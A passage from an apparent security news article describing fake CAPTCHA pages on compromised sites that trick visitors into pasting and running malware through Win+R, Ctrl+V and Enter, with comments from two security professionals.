The attack begins through compromised websites containing malicious JavaScript. When users interact with these sites, theyâre redirected to deceptive pages that display error messages or CAPTCHA verifications, urging users to perform actions such as copying and pasting commands into their systemâs terminal or PowerShell.
âWhen a victim visits a malicious or compromised site, they see a message âChecking if the site connection is secure-Verify you are humanâ just as they would on a real Cloudflare page,â Kelley said in a blog post. Subsequently, a pop-up or on-page message directs users through a sequence of key presses â including Win+R, Ctrl+V, and Enter â resulting in execution of the malware on their machine.
âThe concept of phishing users with fake security controls is not a new one,â said James Maude, field CTO at BeyondTrust. âIn the past, threat actors have had great success with phishing documents that trick users into allowing malicious macros to run using fake security checks that claim the document needs macros enabled for security.â
